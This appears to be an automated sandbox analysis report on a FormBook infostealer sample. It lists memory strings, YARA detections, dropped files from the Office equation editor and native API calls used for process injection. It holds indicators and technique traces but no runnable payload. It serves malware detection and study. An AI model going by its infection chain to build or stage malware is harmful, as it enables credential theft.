          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195388777.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2194994510.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2195836515.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F00AD NtOpenSection,NtMapViewOfSection,4_2_002F00AD
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtSetContextThread,NtResumeThread,4_2_002F1C09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419D50 NtCreateFile,6_2_00419D50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419E00 NtReadFile,6_2_00419E00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419E80 NtClose,6_2_00419E80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419F30 NtAllocateVirtualMemory,6_2_00419F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419D4B NtCreateFile,6_2_00419D4B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419DFE NtReadFile,6_2_00419DFE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419DA4 NtCreateFile,6_2_00419DA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419E7A NtClose,6_2_00419E7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419F2B NtAllocateVirtualMemory,6_2_00419F2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02530048 NtProtectVirtualMemory,LdrInitializeThunk,6_2_02530048
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02530078 NtResumeThread,LdrInitializeThunk,6_2_02530078
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025300C4 NtCreateFile,LdrInitializeThunk,6_2_025300C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_0252FAD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_0252FAE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_0252FB68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FBB8 NtQueryInformationToken,LdrInitializeThunk,6_2_0252FBB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252F900 NtReadFile,LdrInitializeThunk,6_2_0252F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252F9F0 NtClose,LdrInitializeThunk,6_2_0252F9F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_0252FED0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FEA0 NtReadVirtualMemory,LdrInitializeThunk,6_2_0252FEA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FFB4 NtCreateSection,LdrInitializeThunk,6_2_0252FFB4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FC60 NtMapViewOfSection,LdrInitializeThunk,6_2_0252FC60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FC90 NtUnmapViewOfSection,LdrInitializeThunk,6_2_0252FC90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_0252FDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FD8C NtDelayExecution,LdrInitializeThunk,6_2_0252FD8C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02530060 NtQuerySection,6_2_02530060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025310D0 NtOpenProcessToken,6_2_025310D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02531148 NtOpenThread,6_2_02531148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0253010C NtOpenDirectoryObject,6_2_0253010C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025301D4 NtSetValueKey,6_2_025301D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025307AC NtCreateMutant,6_2_025307AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FA50 NtEnumerateValueKey,6_2_0252FA50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FA20 NtQueryInformationFile,6_2_0252FA20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FAB8 NtQueryValueKey,6_2_0252FAB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FB50 NtCreateKey,6_2_0252FB50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FBE8 NtQueryVirtualMemory,6_2_0252FBE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252F8CC NtWaitForSingleObject,6_2_0252F8CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02531930 NtSetContextThread,6_2_02531930
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252F938 NtWriteFile,6_2_0252F938
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FE24 NtWriteVirtualMemory,6_2_0252FE24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FF34 NtQueueApcThread,6_2_0252FF34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FFFC NtCreateProcessEx,6_2_0252FFFC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02530C40 NtGetContextThread,6_2_02530C40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FC48 NtSetInformationFile,6_2_0252FC48
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FC30 NtOpenProcess,6_2_0252FC30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FD5C NtEnumerateKey,6_2_0252FD5C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02531D80 NtSuspendThread,6_2_02531D80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,6_2_008B9862
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B9DAE NtResumeThread,NtClose,6_2_008B9DAE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C500C4 NtCreateFile,LdrInitializeThunk,11_2_00C500C4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C507AC NtCreateMutant,LdrInitializeThunk,11_2_00C507AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4F9F0 NtClose,LdrInitializeThunk,11_2_00C4F9F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4F900 NtReadFile,LdrInitializeThunk,11_2_00C4F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_00C4FAD0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FAE8 NtQueryInformationProcess,LdrInitializeThunk,11_2_00C4FAE8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FAB8 NtQueryValueKey,LdrInitializeThunk,11_2_00C4FAB8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FBB8 NtQueryInformationToken,LdrInitializeThunk,11_2_00C4FBB8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FB50 NtCreateKey,LdrInitializeThunk,11_2_00C4FB50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FB68 NtFreeVirtualMemory,LdrInitializeThunk,11_2_00C4FB68
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FC60 NtMapViewOfSection,LdrInitializeThunk,11_2_00C4FC60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FDC0 NtQuerySystemInformation,LdrInitializeThunk,11_2_00C4FDC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FD8C NtDelayExecution,LdrInitializeThunk,11_2_00C4FD8C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_00C4FED0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FFB4 NtCreateSection,LdrInitializeThunk,11_2_00C4FFB4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C510D0 NtOpenProcessToken,11_2_00C510D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C50048 NtProtectVirtualMemory,11_2_00C50048
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C50060 NtQuerySection,11_2_00C50060
